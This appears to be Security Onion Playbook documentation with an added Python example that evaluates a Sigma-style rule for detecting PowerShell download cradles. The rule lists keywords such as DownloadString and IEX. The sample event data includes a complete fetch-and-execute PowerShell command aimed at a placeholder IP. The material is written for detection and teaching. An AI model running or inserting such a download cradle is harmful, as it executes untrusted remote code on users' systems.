Playbook
Playbook ships with (as of the time of writing) over 2000 detection playbooks built into Security Onion. A detection playbook, or play, combines a Sigma rule with the actions to take when that rule matches. By default, every play shipped with Security Onion is in Draft status and does nothing. To enable them all, select every play with the check box at the top left of the list, click the three-dot menu on the right of any highlighted play, hover over Status and choose Active. Once a play is Active and its Sigma rule matches, it typically generates an alert in the Alerts page. Enabling every shipped play at once gives the broadest coverage, but expect a burst of noisy alerts until low-value plays are tuned or returned to Draft.
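To make the "Sigma rule plus an action on match" idea concrete, here is an added example that is not code from the page or from Security Onion's Playbook. It evaluates a simplified Sigma-style rule against a handful of constructed process-creation events and returns the alert records a play would raise. The rule, the event fields, the alert shape and the evaluator itself are all assumptions for illustration: the evaluator supports only field equality, the `contains`, `startswith` and `endswith` modifiers, and conditions built from `and`, `or`, `not` and parentheses, which is a small subset of Sigma. The rule is written as a Python dict rather than YAML so the block runs without a YAML library.

```python
import re

# Constructed Sigma-style rule, normally authored as YAML. Hypothetical and
# illustrative only; it is not a play shipped with Security Onion.
RULE = {
    "title": "PowerShell download cradle (illustrative)",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        # Within a selection map every field must match (AND); a list of
        # values for one field matches if any value matches (OR).
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": ["DownloadString", "Invoke-WebRequest", "IEX"],
        },
        # Constructed allow-list: exclude runs spawned by the SCCM client.
        "filter_sccm": {"ParentImage|endswith": "\\CCM\\CcmExec.exe"},
        "condition": "selection and not filter_sccm",
    },
    "level": "high",
}

# Constructed process-creation events (assumed field names, Sysmon-like).
EVENTS = [
    {"Computer": "WS01", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"Computer": "WS02", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile Get-Process", "ParentImage": "C:\\Windows\\explorer.exe"},
    {"Computer": "WS03", "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c echo Invoke-WebRequest", "ParentImage": "C:\\Windows\\explorer.exe"},
    {"Computer": "WS04", "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "CommandLine": "pwsh.exe -c Invoke-WebRequest https://updates.example/agent.ps1",
     "ParentImage": "C:\\Windows\\CCM\\CcmExec.exe"},
]


def _match_value(actual, expected, modifier):
    # Sigma string matching is case-insensitive.
    a, e = str(actual).lower(), str(expected).lower()
    if modifier == "contains":
        return e in a
    if modifier == "endswith":
        return a.endswith(e)
    if modifier == "startswith":
        return a.startswith(e)
    return a == e


def _match_field(event, key, expected):
    # "Field|modifier" splits into the field name and an optional modifier.
    name, _, modifier = key.partition("|")
    if name not in event:
        return False
    values = expected if isinstance(expected, list) else [expected]
    return any(_match_value(event[name], v, modifier) for v in values)


def _match_selection(event, selection):
    return all(_match_field(event, k, v) for k, v in selection.items())


def _eval_condition(condition, results):
    """Recursive-descent evaluation of a condition over named selection results.
    Grammar: or := and ('or' and)*; and := not ('and' not)*;
             not := 'not' not | '(' or ')' | selection_name.
    Sigma's aggregation forms ('1 of selection*', count()) are not supported."""
    tokens = re.findall(r"\(|\)|[A-Za-z_][\w]*", condition)
    pos = 0

    def take():
        nonlocal pos
        pos += 1
        return tokens[pos - 1]

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def parse_or():
        value = parse_and()
        while peek() == "or":
            take()
            rhs = parse_and()          # always consume the right side
            value = value or rhs
        return value

    def parse_and():
        value = parse_not()
        while peek() == "and":
            take()
            rhs = parse_not()
            value = value and rhs
        return value

    def parse_not():
        tok = take()
        if tok == "not":
            return not parse_not()
        if tok == "(":
            value = parse_or()
            if take() != ")":
                raise ValueError("unbalanced parentheses in condition")
            return value
        if tok not in results:
            raise ValueError(f"unknown selection {tok!r} in condition")
        return results[tok]

    value = parse_or()
    if pos != len(tokens):
        raise ValueError("trailing tokens in condition")
    return value


def rule_matches(rule, event):
    detection = rule["detection"]
    results = {name: _match_selection(event, sel)
               for name, sel in detection.items() if name != "condition"}
    return _eval_condition(detection["condition"], results)


def run_play(rule, events):
    """The 'action on match' half of a play: emit one alert record per matching
    event. The record shape is an assumption, not Security Onion's alert schema."""
    return [{"rule": rule["title"], "level": rule["level"],
             "host": ev.get("Computer"), "command_line": ev.get("CommandLine")}
            for ev in events if rule_matches(rule, ev)]


if __name__ == "__main__":
    for alert in run_play(RULE, EVENTS):
        print(alert)
```

Only the first event fires: the second lacks a download keyword, the third is not a PowerShell image even though its command line contains the keyword, and the fourth matches the selection but is suppressed by the `filter_sccm` exclusion in the condition. That last case is the one worth keeping in mind when tuning a noisy play: adding a filter selection and referencing it with `and not` is how a Sigma rule is narrowed without deleting the detection.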
New Plays can be created to build custom detections; this will be covered in future scenarios.